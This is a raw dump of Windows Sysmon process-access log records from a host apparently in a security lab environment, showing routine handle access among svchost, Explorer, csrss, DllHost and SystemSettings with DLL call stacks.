12:22:49.644{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043025Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.644{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043024Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.644{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043023Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.644{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043022Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.579{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000043021Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.564{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000043020Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.544{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E499-63C7-3E06-00000000AF02}6872C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043019Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.544{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E499-63C7-3E06-00000000AF02}6872C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043018Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.544{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000043017Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.526{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E499-63C7-3E06-00000000AF02}6872C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043016Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.526{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043015Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.526{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043014Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.526{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043013Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.526{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043012Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.526{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E499-63C7-3E06-00000000AF02}6872C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043011Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.526{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E499-63C7-3E06-00000000AF02}6872C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043010Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.526{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E499-63C7-3E06-00000000AF02}6872C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\KERNEL32.DLL+1d39f|c:\windows\system32\rpcss.dll+25579|c:\windows\system32\rpcss.dll+3fd82|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043009Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.511{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000043008Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.495{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043007Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.495{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043006Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.495{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043005Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.495{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043004Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.495{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043003Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.495{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043002Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.495{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043001Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.495{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 